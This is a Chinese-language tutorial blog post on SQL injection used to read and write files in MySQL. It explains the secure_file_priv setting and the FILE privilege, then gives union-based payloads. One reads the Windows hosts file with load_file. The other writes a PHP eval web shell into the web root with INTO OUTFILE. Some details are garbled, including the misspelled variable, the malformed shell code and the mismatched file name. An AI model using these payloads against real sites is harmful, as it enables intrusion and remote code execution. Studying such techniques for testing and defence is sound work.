Web安全-SQL注入(其他注入方式)

在前两篇文章里讲了sql的基础知识,手动注入和sqlmap自动注入。 本文章讲解读写文件注入漏洞
我们可以利用SQL注入漏洞读写文件。但是读写文件需要一定的条件限制。
前提条件:
1.secure-file-piv 可以在phomyadmin中看到该变量,该参数在高版本的mysql数据库中限制了文件的导入导出操作。改参数可以写在my.ini配置文件中[mysqld]下,若要配置次参数,需要修改my.ini配置文件,并重启mysql服务。
关于参数的说明:

secure-file-piv 参数配置:
secure-file-piv        不对mysqld的导入导出操作做限制
secure-file-piv='c:/a/'    限制mysqld的导入导出操作发生在c:/a/下(子目录有效)
secure-file-piv=null     限制mysqld不允许导入导出操作

在这里插入图片描述
2. 当前用户具有文件权限
查询语句[select File_priv from mysql.user where user=“root” and host=“localhost”]
在这里插入图片描述

3. 知道要写入目标文件的绝对路径

1)读取文件操作
[?id=-1'  union select 1, load_file('C:\\Windows\\System32\\drivers\\etc\\hosts'), 3 --+]

(2)写入文件操作
[?id=1' and 1=2 union select 1, '<?php @eval($REQUEST[777]);>', into outfile 'c:\\phpstudy\\www\\2.php '--+] 直接输入参数,页面如果不报错,说明写入成功。直接访问写入的文件[http://localhost/1.php]
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章